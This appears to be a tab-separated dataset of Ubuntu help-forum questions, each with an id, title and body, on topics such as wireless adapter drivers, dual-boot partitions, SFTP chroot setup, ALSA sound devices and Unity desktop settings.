49180	how do i get a belkin f5d8053 wireless adapter working ?	i 've tried getting my belkin n wireless adapter to work on ubuntu many times with no luck at all . each time i seem to arrive at a dead end . after some thorough searching of ubuntuforums and wifidocs i 've gathered some information and narrowed the problem down to an issue with the rtl819xu driver . here 's some info that may help : $ sudo lshw -c network *-network disabled description : wireless interface physical id : 1 bus info : usb @ 1:2 logical name : wlan0 serial : 00:22:75:38:52 : ac capabilities : ethernet physical wireless configuration : broadcast=yes driver=rtl819xu multicast=yes wireless=802.11b/g/n $ sudo lsmod module size used by vesafb 13449 1 snd_ice1724 106559 2 snd_ice17xx_ak4xxx 13163 1 snd_ice1724 snd_ac97_codec 105614 1 snd_ice1724 ac97_bus 12642 1 snd_ac97_codec snd_ak4xxx_adda 18436 2 snd_ice1724 , snd_ice17xx_ak4xxx snd_ak4114 14326 1 snd_ice1724 snd_pt2258 12986 1 snd_ice1724 snd_i2c 13831 2 snd_ice1724 , snd_pt2258 snd_ak4113 14307 1 snd_ice1724 snd_pcm 80244 4 snd_ice1724 , snd_ac97_codec , snd_ak4114 , snd_ak4113 fglrx 2434640 121 snd_seq_midi 13132 0 snd_rawmidi 25269 2 snd_ice1724 , snd_seq_midi binfmt_misc 13213 1 snd_seq_midi_event 14475 1 snd_seq_midi snd_seq 51291 2 snd_seq_midi , snd_seq_midi_event ppdev 12849 0 snd_timer 28659 2 snd_pcm , snd_seq snd_seq_device 14110 3 snd_seq_midi , snd_rawmidi , snd_seq dcdbas 14054 0 r8192u_usb 297246 0 snd 55295 16 snd_ice1724 , snd_ac97_codec , snd_ak4xxx_adda , snd_ak4114 , snd_pt2258 , snd_i2c , snd_ak4113 , snd_pcm , snd_rawmidi , snd_seq , snd_timer , snd_seq_device soundcore 12600 1 snd parport_pc 32111 1 snd_page_alloc 14073 1 snd_pcm shpchp 32345 0 lp 13349 0 parport 36746 3 ppdev , parport_pc , lp usbhid 41704 0 hid 77084 1 usbhid e100 40108 0 floppy 60032 0 $ sudo iwconfig wlan0 802.11b/g/n mode : managed access point : not-associated bit rate:1 mb/s retry min limit:7 rts thr : off fragment thr : off encryption key : off power management : off link quality=0/100 signal level=0 dbm noise level=0 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:0 invalid misc:0 missed beacon:0 i 'd like to know if 1 ) is the driver is properly installed and recognized by ubuntu ? 2 ) what can i do to load the drivers properly and make use of the adapter ? thanks !
49181	how to share partition between windows and ubuntu ?	i 'm getting a pc with windows and i want to dual boot using ubuntu as my primary os . i want to create a home partition to store all my files and hopefully be able to access them on windows 7 without having to manually mount the partition or anything . i want to know what kind of partition should i create and if i can share my home partition to simplify matters . thanks
49182	is there a public calendar for key ubuntu events ?	i 've been looking at the schedule for ubuntu developer week ( 11th to 15th of july ) , and started entering the schedule into my google calendar ( xml , ical , html ) . at this point , i thought to myself ... maybe there 's a public calendar that is updated with key ubuntu events ? so that has lead to my question . is there a complete public calendar for key ubuntu events ? n.b : events like ubuntu developer summit , ubuntu developer week , ubuntu global jam , releases , lts end-of-life dates , etc .
49184	sudo chown -r root : myusername /var/lib/php/session ( what should i put in username ) ?	i 'm getting this : can not start session without errors , please check errors given in your php and/or webserver log file and configure your php installation properly . so i 'm following this solution : http : //www.electrictoolbox.com/phpmyadmin- can not -start-session-without-errors/ but i have no idea what to put in username . this is how it looks when i launch the terminal : alex @ alex-system-product-name : ~ $ my user is `` alex '' ( e.g . home/alex ) any suggestions ?
49190	can not start session without errors ( phpmyadmin ) ?	i 'm getting this : can not start session without errors , please check errors given in your php and/or webserver log file and configure your php installation properly . i followed this tutorial to fix the problem : http : //www.electrictoolbox.com/phpmyadmin- can not -start-session-without-errors/ but i do n't actually have a /var/lib/php/session ' directory . ( i only have a var/lib/php5 directory ) i get this : chown : can not access `/var/lib/php/session ' : no such file or directory any suggestions ? ( i did n't touch anything , so i assume an update screwed something ) . edit : in var/lib/php there is a file called : sess_eq4jhtrmumanft46oj7o97phdbtv8bcm and it has this : ( sorry , i ca n't paste the code for some reason ) .
49195	how to switch internet access over multiple isp connected via lan ports ?	i have two lan ports , i am connected to two different isp simultaneously . i am aware that i can use only one isp at a time . my problem is how to switch active isp ? i want to do this because sometimes one of the isp becomes slow and i dont want to disconnect and reconnect because it will break my active connection .
49196	how do i create a self-signed ssl certificate ?	i 've set up ssl on my webserver , now i need two files : a certificate a certificate key how do i create a self-signed certificate for testing purposes ?
49199	music player freezes when i switch to one of the terminal window until i login to that terminal	whenever i switch to a terminal window from my x window , ( by pressing ctrl+alt+1 ) my music player ( banshee ) running in x freezes until i login to the terminal window . once i login into it ( or either switch back to my x with or without logging into it ) the music player resumes from the point it freezed . however , i observed that when am transferring files from my laptop to another computer over ssh and if i switch to one of the terminal windows , the transfer does not pause even if i don`t login to the termianl window . i just wanted to know what could possibly be the reason for such a discrimination .
49202	why ca n't i mount a swap partition ?	when i try to sudo swapon -a i get this message : swapon : /dev/sdb4 : read swap header failed : invalid argument sdb4 is where my swap partition is . sudo blkid gives back this : /dev/sdb1 : uuid= '' 75622b47-3265-48a6-a697-265b44bdfe55 '' type= '' ext4 '' /dev/sdb3 : uuid= '' d638620e-b8b1-49ae-b234-7e89aa0de676 '' type= '' ext4 '' /dev/sdb5 : uuid= '' e656-2cab '' type= '' vfat '' /dev/mapper/cryptswap1 : uuid= '' 83e2e318-eee6-4864-a1c4-330bd16bc6a7 '' type= '' swap '' this is the content of fstab : # < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc nodev , noexec , nosuid 0 0 # / was on /dev/sdb1 during installation uuid=75622b47-3265-48a6-a697-265b44bdfe55 / ext4 errors=remount-ro 0 1 # swap was on /dev/sdb4 during installation # uuid=86d7eebb-b840-4fb0-a1fc-a84074062cb2 none swap sw 0 0 # /dev/fd0 /media/floppy0 auto rw , user , noauto , exec , utf8 0 0 /dev/sdb4 none swap sw 0 0
49203	unknown cmake command `` kde4_install_icons ''	i 'm trying to build kile . when i type : cmake `` /home/user/downloads/kile-2.1/src '' -dcmake_install_prefix= $ home/kile-install -dcmake_build_type= '' debug '' -wno-dev then there is an error : cmake error at data/icons/actions/cmakelists.txt:1 ( kde4_install_icons ) : unknown cmake command `` kde4_install_icons '' . i 'm using cmake version 2.8.3 . how to get rid off this error ?
49210	how to recover ubuntu installed with wubi with corrupted grub	i have ubuntu installed inside windows 7 using wubi . yesterday , i tried installing ubuntu using grub but it seem that grub was corrupted . to recover , i fixed the mbr using the windows 7 cd . now windows 7 is booting from grub menu , but when i select ubuntu the system reboots . how can i fix the problem of booting into ubuntu ? i can see the ubuntu installed in the windows 7 ?
49214	problem opening a large .doc file	i am trying to open a 33 page xxx.doc file which has data in in a table ( 3 coloumns x 200+ rows ) using libre office 3.3.2 . the files take ~4-6 minutes to open ( all other applications and smaller documents opens real fast and i have a new and fast laptop ) . during this time entire libreoffice will appears as hung . i checked swap usage using free and i can see it used some swap , but very little . once i open the document , i do see the data and table alignment completely lost . there are some areas table has contents , but by and large data is not within the cells as expected . how i can speed up the opening process and how i can get the data almost like when i open with ms-office ?
49218	running two firefox instances -- one locally and another through ssh	i would like to have two firefox instances running at the same time in my laptop , one locally and another opening an instance through an ssh connection to another computer . if i just try to open the ssh'ed instance , it gets gobbled up into my existing local instance ( opens a new tab ) , and i can not access the remote disks , since it 's just a new tab in the local instance , to upload pictures through a web page , for example . if i just close the local instance and call firefox from ssh , then i can open it remotely , but i can not open it locally , gets associated to the remote instance again . is there a way of doing that ?
49220	what is the equivalent to motd.tail in 11.04 ?	motd.tail is deprecated according to this bug report : motd ( 5 ) says : `` the contents of this file are regenerated upon every system boot based on the contents of /etc/motd.tail . '' this is not true anymore , as ubuntu uses the update-motd framework . any reference to motd.tail should be replaced with a reference to the update-motd framework or update-motd ( 5 ) . the manpage for motd.tail should be removed . i 'm using it to identify my servers when i log in and make sure i 'm on the right machine , so i do n't need anything dynamic , just a simple message . what is the equivalent to motd.tail ( appending a small message to the end of the motd ) that works with ubuntu 11.04 ?
49227	no longer able to connecto to wpa wireless network .	i used to connect to a wireless network at the place where i live providing a password using wpa ( do n't really know what that is ) , it 's been a few months since i ca n't connect anymore , the problem is this : when ubuntu starts it sees the network but keeps asking for the password and does n't connect . what could be the cause ? the landlord did not change the access point password and he 's using windows on his laptop and works fine . i did not change any network configuration file on my system ... thank you so much . luca .
49231	system freezes when external monitor is enabled	i have a laptop with a dual head nvidia graphic card . i have two external monitors connected to the docking station . i am running 11.04 ( upgraded from 10.10 , which was a clean install ) . ubuntu starts on the laptop monitor per default . when i use the nvidia gui config utility to turn on twinview ( i have the nvidia proprietary drivers ) , the selected monitor gets a signal as expected , and there is this dialog box which counts seconds i have left to confirm the new configuration . the moment i click ok , the ui freezes . the dialog box does n't disappear , it remains there , but stops counting the remaining seconds , frozen at `` you have 4 seconds left '' . the mouse cursor moves freely , but nothing responds to clicks or hovering . normal keyboard inputs are n't recognized either ( e.g . alt+tab ) . i could never use magic keys on the laptop , because sysrq requires both fn and alt gr use , so i could n't test if this works . there is no way to interrupt the freeze , i have to do a restart from the hardware button in order to get the computer working again . how can i get this to work ? i need it to work from the gui config , not to be hardwired in the x configuration file , because i often use the laptop away from the docking station , and want it to start on the laptop screen per default . update i could reproduce the problem with four different monitors , both through the docking station and directly connected on the laptop 's vga . nothing gets written to xorg.0.log during or after the crash . this is strange , because when i added a monitor to another computer running 10.10 , it registered the change as [ 2823.214 ] ( ii ) nvidia ( 0 ) : setting mode [ 2823.215 ] ( ii ) nvidia ( 0 ) : `` crt-1:1280x1024 @ 1280x1024+2560+0 , dfp-0 : nvidia-auto-select @ 2560x1440+0+0 '' i connected an external keyboard and discovered that sysrq works after the crash . i was able to kill x and log in again .
49238	better keyboard control in shell	i work a lot in vim and the thing that frustrates me is when i have to switch to the shell , that i lose a lot of the keyboard control that vim has . for example i have to use home and end to get to beginning and end of the line . how do you deal with this annoyance ?
49245	start multiple apps running in shells split in one console	i need to start multiple apps running in shells and monitor their execution . currently i have a main script that launches every apps in a new gnome-console but i would prefer to launch them all in the same window in split screens . this post multiple shells in one window explains how to use split screens with many type of console applications such as screen , terminator and byobu . this works fine manually but i would like to be able to start all my apps in a split screen console automatically from my main scrip . in the documentation from the tools mentioned above there was nothing i could fine to achieve this automatically from a script . any ideas ?
49248	are the programs in ubuntu software center spy-ware free ?	in ubuntu software center there are different sections for programs provided by ubuntu canonical partners for purchase i know all of these are open-source ; but is there any validation process done by the canonical to ensure that they are free of any spyware or malware ? i wonder will anyone get time to look at all these ( 2355 programs or so as of now ) , software code that too for every release ! ! i am worried because i routinely install rather unpopular software from software center : )
49249	is a zotac geforce gt 220 supported ?	i am planning to install ubuntu 11.04 on a machine using zotac geforce gt 220 . does anyone know if this card is supported ? thanks
49255	risks/disadvantages associated with wine	can wine as a whole or the windows applications installed via wine pose some kind of risk to an ubuntu installation ? this question arose in my mind when i read this answer to my earlier question accessing ie only sites : try installing playonlinux from playonlinux.org and install ie via playonlinux . and use ie only for those pesky sites : ) - received 1 downvote and enjoying the risks of ie ? no thanks - this comment received 2 upvotes i believe this playonlinux works as a frontend to wine making installing tasks easier . in totality , i want to know if it is safe to install internet connecting applications like ie via wine ? is there any remote possibility of being subject to more online attacks and virus threats this route . i plan to use ie only for browsing websites not accessible with other browsers , like the one in earlier question .
49258	how do i partially suppress the command-line output of zip ?	the background : i have a python script that generates a bunch of images ( png format , minimum of several hundred ) , runs ffmpeg to turn them into a short video , and then puts all of the images into a zip archive so i can go back if i find any strange or interesting things where i want the individual frame . the issue : originally the zip portion read as zip -q -t -m output *.png but that suppressed all the output , including the statement as to whether the file is ok. is there a way to suppress the large number of updating : stars0053.png ( deflated 5 % ) without suppressing the output of the -t switch ?
49261	screen blacks out after pressing a key on keyboard , specially enter key	i have natty and have installed kubuntu-desktop package . before installing it , everything was fine but after that , this thing happens : when i 'm typing , after stroking a key , screen blacks out , fan speeds up , and i have to turn off machine by pressing power button . it just happens in many different apps ( chromium , hotot , kde proxy settings , ... ) and in every environment : unity , kde , gnome 2 . i do n't know what details must provide with this question , and i do n't like to remove my kde desktop , or re-install ubuntu .
49263	appearance & effects ubuntu 11.04	i ca n't find any effects in the appearance tab . i want the jelly effect help me please !
49271	how to setup a sftp server with users chrooted in their home directories ?	i have been trying to set up a sftp server with multiple users chrooting into their home directories . i followed the advice on this guide and then executed the following commands on the user 's directories chown root : root /home/user/ chmod 755 /home/user/ there is an additional folder in every user 's home directory called public which is owned by it 's user so as to allow them to create directories and upload and remove files as needed . ( this was advised in the guide i mentioned earlier ) now when i execute sftp -p 435 user @ localhost , i get this error : write failed : broken pipe could n't read packet : connection reset by peer how do i proceed from here ? the ultimate idea is to have each user on some other machine use filezilla to log into their chrooted home directories and then be able to upload directories and files . all this in sftp ( coz it 's more secure )
49272	how to remove an item from my context menu ?	i installed a program called aptana studio 3 . it 's added a menu item to my context menu ( if i right click i see an option `` aptana studio '' ) . how can i manually remove this from my menu ? i have searched high and low and ca n't find a way to remove the aptana stuff from my firefox . perhaps it 's because i 'm on firefox 4 . what i have done is i 've gone into about : config i then searched for aptana and there are 3 items that are listed . i 've attached a screenshot . my question now is how can i remove these items because perhaps this will remove the option from my menu .
49273	sharing files between 2 ubuntu one accounts	i have ubuntu-one both at work and at home , and would like to share files between the two . however , these are set up under two different ubuntu-one accounts , with different logins and passwords ; i 'd like to integrate both accounts into one , with the same login/password , so that files can be shared/synced between the two . is this possible ?
49274	how to change the order of startup applications ?	i 'm running ubuntu 10.10 maverick . i have a long list of startup applications as you can see here : i have added an entry for google chrome , and i would like google chrome to start like first of all the other applications ... how is this done ?
49281	powernap and wake on lan	i installed powernap on my headless ubuntu 11.04 server and according to webmin the number of running tasks reduced from 105 to 89 . the problem is that the server no longer wakes up from lan ( wol ) when i send a wol package either from my pc or ipod touch the server does not respond . i need to go to the server and press the power button to get it running again . i have proved that powernap causes the problem by uninstalling it , and then wol works again . how can i configure powernap so that it does not stop wol from working ?
49286	is it possible to blacklist subfolders in banshee ?	i am using djmount to mount upnp music folders and then import from them into banshee . unfortunately , i set up the server in a way that for each artist there is an -- all -- subfolder containing all the songs for that artist . this causes all songs to be imported twice into banshee . is there a way to solve this without reconfiguring the server ?
49288	monitor ubuntu web camera on android	i want to monitor web camera on ubuntu to my android . what application can i use ? i like icam but it works ony on windows . thanks in advance !
49290	constant uuid on usb install	i 've got an ubuntu install on a usb with a separate ntfs partition , can i expect the same uuid for the partition if i removed and reattached the usb to a computer ?
49298	what 's the difference between flashplugin-installer and adobe-flashplugin ?	i usually installed flashplugin-installer and by chance noticed that in the partner repository the flash entry says it 's not installed . it also says the package flashplugin-installer will be removed if i install the package from the partner repository named adobe-flashplugin . i 've read this answer . does flashplugin-installer download flash from adobe as opposed to adobe-flashplugin available in the partners repo ? if not , how do they differ ?
49299	can i use a desktop as a network server ?	pardon me if i 'm asking the wrong question . but i am a newbie in networking and i 'm not sure what direction to go on this . i have just setup an ubuntu desktop . i am planning to convert it to a network server without losing the gui interface ( again , i 'm a newbie ) and use it to manage and monitor user access to a network with a small number of network terminals all running on windows . my purpose is to use the new server to filter sites accessed by each terminals , monitor sites being visited by employees and grant access to both group and user-specific folders based on their ip address . is this possible ? what server software do i need to install ? how do i structure the hardware ? ( i have a router , a hub , the ubuntu server and the network terminals ) how do i assign privileges to users and monitor them at the same time ? thank you in advance for your replies .
49301	ubuntu 11.04 with gnome 2 ?	i recently upgraded to ubuntu 11.04 and i was not happy with the default user interface ( unity ) . what options i have if i do n't want to use this ui as i prefer windows-like gnome 2 from previous ubuntu versions ? can i install gnome 2 on 11.04 ? is gnome 3 similar to gnome 2 or is it experimental as unity ? what is the relationship between gnome 3 and gnome shell ? i am really confused by all these options . i just want to have classic taskbars and menus like the ones that are in gnome 2/windows/mac os x .
49302	i 've just bought my first 23 '' monitor . which settings to tweak to fill myself comfortable with 1920x1080 ?	i 've just installed ubuntu 10.04 on my brand new computer with 23 '' 1920x1080 monitor . this is my first experience with such a large screen resolution . i do n't know what settings should be changed but i feel myself uncomfortable . 1920x1080 resolution is very unusual to me . what did you do to feel comfortable with 1920x1080 ? please share your experience . i would also like to know where i can make adjustments to the screen so i can try different settings to find the ones that will make it look better .
49304	windows is excruciatingly slow after wubi installation	i installed wubi on my windows 7 64bit machine yesterday , and since then , the windows partition is ridiculously slow . as in , takes an hour to boot . once it boots , it takes ten minutes to log in . rebooting takes an hour or so to shut down . the c : drive is an ssd , but it did n't have enough space for wubi , so i put wubi on the other 500gb regular spinning-disk secondary partition . i do n't know if that matters . i did see this : http : //ubuntuforums.org/archive/index.php/t-373876.html but i 'm not sure that 's a relevant link . what can i do to fix this problem ? if the best solution is to install ubuntu in a second partition ( and by 'best ' i mean `` able to work again as quickly as possible with a minimum of debugging time , this has cut my productivity to nothing '' ) , then how can i undo this ? edit : i believe i 'm experiencing issues similar to what 's described here : http : //www.tomshardware.com/forum/250282-32-major-problems-formatting-partitioning-intel-windows-install i tried to reinstall windows this evening , and it just failed miserably on the drive . so badly , in fact , that it got to 29 % of files copied , and then just crapped out . that means that something on the drive is dead , especially since the same copy of windows is now installing without any apparent issues on the spinning disk . looks like the timing of this failure just happened to coincide with the wubi installation .
49305	how can i get the application menu to always be active ?	i 've just installed ubuntu via wubi , and i 'm getting used to it . one thing i 've noticed is that the application menu ( file , edit , view , etc ) disappears unless the mouse is positioned over the menu bar across the top . how can i get that menu to always be up ?
49310	is there any way of enabling middle click scrolling ?	the issue is similar to this : thinkpad middle button scrolling but here , i have an average computer . basically , when i press the middle button in windows and move the cursor a little from the starting position the page starts scrolling which is very convenient because i do n't have to scroll the wheel madly . i looked at the second solution to the question mentioned earlier ; the button drop down menu is greyed out . thanks in advance .
49316	how do i change 'small ' fonts ?	i like to use rather small fonts , dejavu sans 8 @ 86 dpi , this suits me perfectly , however some apps seem to use even smaller fonts for certain elements , such as the notify bubbles where the headline looks fine but the text below is even smaller , probably size 7 , the same goes for gwibber and tomboy and software centre . here 's a screenshot of what i mean : so my question is , how do i change the size of these smaller fonts ? i recently spent a week in kubuntu and all fonts were configurable including 'small ' fonts . how do i do this in ubuntu ? ps : i know how to go into appearance > fonts . what i 'm looking for is not there .
49325	tomboy creates a 0 folder in home directory	tomboy has created a directory called 0 in my home directory . it looks ugly wherever my home folder appears ( screenlets ) . is there someplace else i could move it . i 've tried looking in ~/config/tomboy/ but could not find something useful . the 0 directory consists of 3 folders - 0,1,2 each containing a manifest.xml file and some .note files .
49335	unity consuming 100 % cpu	i have an hp laptop with nvidia drivers . when i 'm running top i can see that unity-panel-service is consuming 100 % cpu for about 20 seconds and then the cpu consumption goes down to about 10 % cpu for about 5 seconds . and this cycle continues . i tried killing the process . but it spawns a new process and it seems to work without any problem for sometime but after that the problem appears again . how can i fix this ?
49339	file manager opens automatically after booting	the file manager starts off just after login . it keeps on opening different windows , none of them opens up , neither can i kill using ps -e. any ideas would be great .
49344	does the wacom bamboo pen ( only pen ) tablet work with 11.04 ?	with or without tweaking , i just need to know . there 's lots of stuff on google , and this website about 10.10 , but nothing about 11.04 . my bamboo fun used to not work with 10.04 or 10.10 , but it does work in 11.04 , does that mean the wacom bamboo pen would work ?
49345	how can i disable truncated long filename in icon view ?	i would like to know how i can disable the feature in nautilus which truncates long filenames in icon view ? i beleive there may be a gconf key which controls this but i 'm not sure which specific key , if it exists , or has to be added manually .
49347	intel sandy bridge no sound through hdmi	i am running ubuntu 11.04 and i have an asrock h67m-itx/ht motherboard which is the intel sandy bridge architecture . i ca n't get sound to play through my tv on the hdmi interface . i have plugged in headphones and they work . i have also tried changing the device in sound preferences to the hdmi options provided digital stereo ( hdmi ) output digital stereo ( hdmi ) output + analog stereo input digital stereo duplex ( iec958 ) digital stereo ( iec958 ) output + analog stereo input when i run the following command it plays sound fine . aplay -d plughw:0,7 /usr/share/sounds/alsa/front_center.wav
49348	how do i set a theme in oneiric ?	i 'm using oneiric , and have some default theme set . i understand unity is using gtk3 , and that the usual ubuntu themes have n't been ported . how do i set the theme in oneiric ? where is/will the new appearance settings dialog /be ?
49351	alsa lists no capture device	so , for some reason , i 'm not allowed to prefix my post with the word `` hey '' ? strange . anyway : i just got a new headset , and to my great surprise , alsa does n't even believe that a line-in exists . alsamixer/aplay -l/arecord -l list no capture devices . audio out has worked wonderfully ( over hdmi ) since i built the machine , but no other output ports have ever worked ( tested on linux only ) . here 's some useful stuff , i think : alsamixer lists a total of four playback devices ( s/pdif , s/pdif 1 , s/pdif 2 , s/pdif 3 ) and no capture devices . i 've never used alsamixer before , but it appears that something is wrong ( should n't there be activity if something is playing ? ) . here 's a screenshot , taken while playing music ( again , i have no problem hearing the playback ) ( ubuntu 's sound preferences panel tells me that mocp is using an alsa plug-in . ) : http : //imgur.com/vrmuj.png '' all '' lists these four devices , and `` capture '' lists nothing at all ( `` this sound device does not have any capture controls. '' ) . ubuntu 's sound preferences panel lists no devices in the `` input '' tab . the `` output '' tab lists one `` gf110 high definition audio controller '' with one `` digital stereo ( hdmi ) output '' . this output appears to be fairly widely requested : $ arecord -l **** list of capture hardware devices **** $ aplay -l default playback/recording through the pulseaudio sound server pulse playback/recording through the pulseaudio sound server hdmi : card=nvidia , dev=0 hda nvidia , hdmi 0 hdmi audio output hdmi : card=nvidia , dev=1 hda nvidia , hdmi 0 hdmi audio output hdmi : card=nvidia , dev=2 hda nvidia , hdmi 0 hdmi audio output hdmi : card=nvidia , dev=3 hda nvidia , hdmi 0 hdmi audio output dmix : card=nvidia , dev=3 hda nvidia , hdmi 0 direct sample mixing device dmix : card=nvidia , dev=7 hda nvidia , hdmi 0 direct sample mixing device dmix : card=nvidia , dev=8 hda nvidia , hdmi 0 direct sample mixing device dmix : card=nvidia , dev=9 hda nvidia , hdmi 0 direct sample mixing device dsnoop : card=nvidia , dev=3 hda nvidia , hdmi 0 direct sample snooping device dsnoop : card=nvidia , dev=7 hda nvidia , hdmi 0 direct sample snooping device dsnoop : card=nvidia , dev=8 hda nvidia , hdmi 0 direct sample snooping device dsnoop : card=nvidia , dev=9 hda nvidia , hdmi 0 direct sample snooping device hw : card=nvidia , dev=3 hda nvidia , hdmi 0 direct hardware device without any conversions hw : card=nvidia , dev=7 hda nvidia , hdmi 0 direct hardware device without any conversions hw : card=nvidia , dev=8 hda nvidia , hdmi 0 direct hardware device without any conversions hw : card=nvidia , dev=9 hda nvidia , hdmi 0 direct hardware device without any conversions plughw : card=nvidia , dev=3 hda nvidia , hdmi 0 hardware device with all software conversions plughw : card=nvidia , dev=7 hda nvidia , hdmi 0 hardware device with all software conversions plughw : card=nvidia , dev=8 hda nvidia , hdmi 0 hardware device with all software conversions plughw : card=nvidia , dev=9 hda nvidia , hdmi 0 hardware device with all software conversions and here 's my alsa-base configuration ( completely ubuntu stock ) : $ cat /etc/modprobe.d/alsa-base.conf # autoloader aliases install sound-slot-0 /sbin/modprobe snd-card-0 install sound-slot-1 /sbin/modprobe snd-card-1 install sound-slot-2 /sbin/modprobe snd-card-2 install sound-slot-3 /sbin/modprobe snd-card-3 install sound-slot-4 /sbin/modprobe snd-card-4 install sound-slot-5 /sbin/modprobe snd-card-5 install sound-slot-6 /sbin/modprobe snd-card-6 install sound-slot-7 /sbin/modprobe snd-card-7 # cause optional modules to be loaded above generic modules install snd /sbin/modprobe -- ignore-install snd $ cmdline_opts & & { /sbin/modprobe -- quiet -- use-blacklist snd-ioctl32 ; /sbin/modprobe -- quiet -- use-blacklist snd-seq ; } # # workaround at bug # 499695 ( reverted in ubuntu see lp # 319505 ) install snd-pcm /sbin/modprobe -- ignore-install snd-pcm $ cmdline_opts & & { /sbin/modprobe -- quiet -- use-blacklist snd-pcm-oss ; : ; } install snd-mixer /sbin/modprobe -- ignore-install snd-mixer $ cmdline_opts & & { /sbin/modprobe -- quiet -- use-blacklist snd-mixer-oss ; : ; } install snd-seq /sbin/modprobe -- ignore-install snd-seq $ cmdline_opts & & { /sbin/modprobe -- quiet -- use-blacklist snd-seq-midi ; /sbin/modprobe -- quiet -- use blacklist snd-seq-oss ; : ; } # install snd-rawmidi /sbin/modprobe -- ignore-install snd-rawmidi $ cmdline_opts & & { /sbin/modprobe -- quiet -- use-blacklist snd-seq-midi ; : ; } # cause optional modules to be loaded above sound card driver modules install snd-emu10k1 /sbin/modprobe -- ignore-install snd-emu10k1 $ cmdline_opts & & { /sbin/modprobe -- quiet -- use-blacklist snd-emu10k1-synth ; } install snd-via82xx /sbin/modprobe -- ignore-install snd-via82xx $ cmdline_opts & & { /sbin/modprobe -- quiet -- use-blacklist snd-seq ; } # load saa7134-alsa instead of saa7134 ( which gets dragged in by it anyway ) install saa7134 /sbin/modprobe -- ignore-install saa7134 $ cmdline_opts & & { /sbin/modprobe -- quiet -- use-blacklist saa7134-alsa ; : ; } # prevent abnormal drivers from grabbing index 0 options bt87x index=-2 options cx88_alsa index=-2 options saa7134-alsa index=-2 options snd-atiixp-modem index=-2 options snd-intel8x0m index=-2 options snd-via82xx-modem index=-2 options snd-usb-audio index=-2 options snd-usb-caiaq index=-2 options snd-usb-ua101 index=-2 options snd-usb-us122l index=-2 options snd-usb-usx2y index=-2 # ubuntu # 62691 , enable mpu for snd-cmipci options snd-cmipci mpu_port=0x330 fm_port=0x388 # keep snd-pcsp from being loaded as first soundcard options snd-pcsp index=-2 # keep snd-usb-audio from beeing loaded as first soundcard options snd-usb-audio index=-2 and some more output that i 've seen requested in my recent googling : $ cat /proc/asound/card0/codec* | grep codec codec : nvidia gpu 18 hdmi/dp codec : nvidia gpu 18 hdmi/dp codec : nvidia gpu 18 hdmi/dp codec : nvidia gpu 18 hdmi/dp so , is there anyone with answers ? more output available upon request . my version of ubuntu is 11.04 dist-upgraded from 10.10 , but since this is a problem in the core packages and has existed for me since 10.04 , i 'm fairly sure this is n't a problem specific to a particular ubuntu variant or version .
49365	what happens when support has ended for a specific version of ubuntu ?	so old versions of ubuntu are unsupported . what does that mean ?
49370	hda intel alc269vb internal mic only records a high-pitched whine	the title pretty much says it all . see also : https : //bugs.launchpad.net/ubuntu/+source/alsa-driver/+bug/799058 this did n't work . any ideas ?
49371	fstab folder bind on partition mounted with defaults parameter	i want bind some folders in my home directory with some folders in a ntfs partition . will mounting the ntfs partition with only the defaults parameter affect my read/write access ?
49374	web site for update manager changes / description	the changes / description tabs in the update manager are very useful to get a concise explanation for each update , but i only use the shell to update now ( sudo sh -c `` apt-get update & & apt-get -y dist-upgrade & & apt-get -y autoremove & & apt-get autoclean '' ) . is there some web site where i can subscribe to a feed for these upgrades ? that would be more convenient than going back to the gui or trying to figure out after the fact where all the information is on my local box . edit to summarize : a chronological list of all updates to all packages , not one list per package . in other words , exactly like in the update manager . preferably with about the same amount of information as is shown in the update manager , but with links to bug reports , vcs log , diffs and other relevant information . preferably retrievable as a web feed , to be able to read it in a more sane way than repeatedly checking a web site manually . this would be an awesome way to keep track of the updates without having to read them at install time , and with the possibility to dig into lots more detail when wanted . who knows , maybe it could even lead to more community participation , since it is essentially a furthering of the existing style of openness ?
49375	unlock keyring comes thrice on every boot	i am running natty 11.04 on an acer aspire one netbook . it is working fine with just a few issues . one of those is this annoying unlock keyring prompt which comes thrice on every boot . i have my chat accounts , broadcast accounts and ubuntu one account configured and maybe this is why it comes three times . however , i also check the option `` unlock this keyring next time i log in . '' on all the 3 keyring prompts but it still comes on every boot . i would like to know how i can stop these annoying prompts to come all the time on each and every boot . also , if i am not connected to the internet , this prompt comes just once ( and not thrice ) . i dont want to disable any of my services but would like these prompts not to come up and to get these keyrings unlocked everytime i boot my netbook . please help ! : )
49378	how do i start gnote minimized ?	i am using unity and i want gnote to start minimized . when i start it now its search dialog is shown . if it matters i am not using the standard setup because i have set gnote to autostart and i have put gnote in the panel by doing the following ( which i learned from another question ) : cd .config/autostart/ cp gnote.desktop gnote.desktop.old cp /usr/share/applications/gnote.desktop ./ gsettings set com.canonical.unity.panel systray-whitelist `` $ ( gsettings get com.canonical.unity.panel systray-whitelist | sed -e `` s/ ] $ / , 'gnote ' ] / '' ) two screenshots to illustrate . what i want : what i get now :
49379	does unity on unr provide power savings over the traditional ui ?	i have recently installed unb on my atom-based netbook ( side-by-side with the default windows 7 starter ) , and i 'm very disappointed with the default interface . i really like the design , it looks tailor-made for netbooks - but it is so limited ! ( no shortcuts on the sidebar , or on the desktop ; generally confusing ) i 'm considering a switch to the traditional user interface , the only thing which would make me stick with unity is if it would provide power savings over the standard ui .
49380	vtg-plugin dependencies not met	i am trying to compile the vtg-plugin from source however i am getting the error `` vtg-dependencies not met '' which complains about libpeas and gedit . the version of gedit it is asking for is 2.91.0 , while the version of libpeas it wants is 0.7.4 . running pkg-config -- modversion gedit-2.20 returns 2.30.4 pkg-config -- modversion libpeas-1.0 returns 0.7.3 my problem is running apt-get for the latest versions ( apt-get update and apt-get upgrade ) tells me i am using the latest version can someone explain ?
49386	stop screenlets from minimizing	i 've setup my screenlets exactly the way that i want them , but i do n't have a quick access to any of them . the screenlet config offers me the following : keep above , below , sticky , locky , widget . out of these only treat as widget seems to be of any use here . i just looked at this in detail and thought it was what i was looking for . it might have been a workaround for the issue ( instead of minimizing i would just press f9 . but this means that the widget hides itself from the normal desktop , which is not what i want . what i want is that on pressing ctrl+alt+d or super+d , i should see the desktop with my screenlets there . i do n't want them to minimize with the rest of the windows . as a final struggle , i 've thought of a solution using compiz to declare the screenlet windows as non-minimizing , but surely there must be a better way than that . ( instructions for this would be helpful as well - i 'm not sure what to enter in the rule matches )
49387	is there mono appindicator/notification area icon available for xchat ?	despite the steady reports of mono icons appearing for programs on sites like omg ! ubuntu ! , the popular xchat still seems to be missing a mono icon . in addition to that . how can we recommend it for inclusion into the repository package ?
